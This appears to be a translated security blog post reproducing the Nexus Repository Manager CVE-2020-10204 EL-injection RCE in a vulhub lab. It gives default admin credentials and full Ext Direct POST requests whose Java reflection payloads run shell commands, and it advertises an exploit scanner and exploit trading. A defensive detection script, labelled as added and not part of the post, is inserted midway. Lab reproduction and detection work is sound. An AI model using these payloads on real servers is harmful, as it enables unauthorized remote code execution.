[Double Festival Celebration] CVE-2020-10204 Nexus RCE Vulnerability Reproduction

Category: Security articles

First of all, happy Mid-Autumn Festival and National Day to all you masters! Today is a fairly meaningful day for me too: it started on 10.1, but it will not end on 10.1. I hope everyone stays true to their original aspirations. Keep it up! There is an easter egg at the end...


1. Environment setup:

Enter the image directory:

cd vulhub/nexus/CVE-2020-10204

Start the environment:

docker-compose up -d

Visit port 8081.





2. Vulnerability description:

The Sonatype Security Team published an advisory about a remote code execution vulnerability in Nexus Repository Manager 3.x. An authenticated attacker can achieve remote code execution through EL expression injection: the filtering in org.sonatype.nexus.common.template.EscapeHelper#stripJavaEl can be bypassed. Administrator privileges are required.


Affected versions: Nexus Repository Manager OSS/Pro 3.x <= 3.21.1


3. Vulnerability reproduction:

1. Log in to the admin console: admin / admin




2. After logging in, construct a POST request (note: the NX-ANTI-CSRF-TOKEN header must be included):

POST /service/extdirect HTTP/1.1
Host: 192.168.136.131:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
NX-ANTI-CSRF-TOKEN: 0.09964664409272361
Cookie: NX-ANTI-CSRF-TOKEN=0.09964664409272361; NXSESSIONID=af669d6c-9231-4be8-b83c-b89471ef65c9
Connection: close
Content-Type: application/json
Content-Length: 289

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"22212","description":"3333","privileges":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"],"roles":[]}],"type":"rpc","tid":89}

Send the request:




Another interface, coreui_User, can also be used:

{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"[email protected]","status":"active","roles":["$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}

Created successfully:



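A defensive check for the two request bodies above, added here as example code that is not part of this post or of Nexus: it classifies raw /service/extdirect bodies by action and method and flags the EL-injection markers (the `$\A{` opener and the Java reflection chain) in the role and privilege fields, which is what a WAF rule or log review for this CVE would key on. The sample bodies, the privilege name nx-example-read and the coreui_Repository action are constructed for this example.

```python
import json
import re

# Markers for EL-expression injection against Nexus's /service/extdirect endpoint.
# The optional backslash-escape between `$` and `{` covers plain `${...}` as well
# as the `$\A{...}` variant this page uses to get past stripJavaEl.
EL_OPEN = re.compile(r"\$(?:\\[A-Za-z])?\{")
JAVA_EXEC = re.compile(r"getClass\(\)|forName\(|java\.lang\.Runtime|\.exec\(")
# Ext Direct action/method pairs whose role and privilege strings reach the template code.
WATCHED = {("coreui_Role", "create"), ("coreui_Role", "update"),
           ("coreui_User", "create"), ("coreui_User", "update")}
ACTION_RE = re.compile(r'"action"\s*:\s*"([^"]+)"')
METHOD_RE = re.compile(r'"method"\s*:\s*"([^"]+)"')

def inspect_extdirect_body(body: str) -> dict:
    r"""Classify one raw request body. Regexes run on the raw text because the
    `$\A{` variant is not valid JSON, so json.loads() alone would miss it."""
    action_m, method_m = ACTION_RE.search(body), METHOD_RE.search(body)
    action = action_m.group(1) if action_m else None
    method = method_m.group(1) if method_m else None
    reasons = []
    if EL_OPEN.search(body):
        reasons.append("el-expression-open")
    if JAVA_EXEC.search(body):
        reasons.append("java-reflection-chain")
    try:
        json.loads(body)
    except ValueError:  # e.g. the invalid `\A` escape in the bypass payload
        reasons.append("json-parse-failure")
    watched = (action, method) in WATCHED
    suspicious = watched and ("el-expression-open" in reasons or "java-reflection-chain" in reasons)
    return {"action": action, "method": method, "watched_endpoint": watched,
            "suspicious": suspicious, "reasons": reasons}

def flagged(bodies: dict) -> list:
    # Names of the bodies that look like EL injection attempts on a watched endpoint.
    return [n for n, b in bodies.items() if inspect_extdirect_body(b)["suspicious"]]

# Constructed samples: the first two reproduce the page's payloads (harmless marker
# command); the others are benign, with made-up privilege and action names.
PAYLOAD = (r"$\A{''.getClass().forName('java.lang.Runtime').getMethods()[6]"
           r".invoke(null).exec('touch /tmp/success')}")
SAMPLES = {
    "role_create_el": ('{"action":"coreui_Role","method":"create","data":[{"id":"1111",'
                       '"name":"22212","privileges":["' + PAYLOAD + '"],"roles":[]}],"type":"rpc","tid":89}'),
    "user_update_el": ('{"action":"coreui_User","method":"update","data":[{"userId":"www",'
                       '"status":"active","roles":["' + PAYLOAD + '"]}],"type":"rpc","tid":9}'),
    "role_create_ok": ('{"action":"coreui_Role","method":"create","data":[{"id":"dev",'
                       '"name":"developers","privileges":["nx-example-read"],"roles":[]}],"type":"rpc","tid":3}'),
    "other_ok": '{"action":"coreui_Repository","method":"read","data":[],"type":"rpc","tid":4}',
}
```

Calling flagged(SAMPLES) returns the two injected bodies and leaves the benign role creation alone; the json-parse-failure reason is only a supporting signal, since a parse error alone is not enough to flag a request.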


Easter egg: one-click vulnerability detection script (self-written)

python3 NexusRCE_Scan.py http://192.168.136.140:8081

Supports one-click detection of CVE-2019-7238, CVE-2020-10199 and CVE-2020-10204:


1. Script output:


The payload uses a random string, which reduces duplicate detections and the false-positive rate.


2. The conf.py configuration file; it needs to be edited for your actual setup:


Leave a message on the public account with: NexusRCE_Scan to get the script


All of you masters are welcome to add me as a friend to study and exchange ideas together; if a previously shared exp no longer works, you can also add me and we can trade (py) one: qq: 1254311935

Friend-request note: public account + your handle


Give it a like and a "Wow", and feel free to share!

If the script has errors or bugs, feel free to discuss them in the reader comments below, or message me directly so I can correct them!

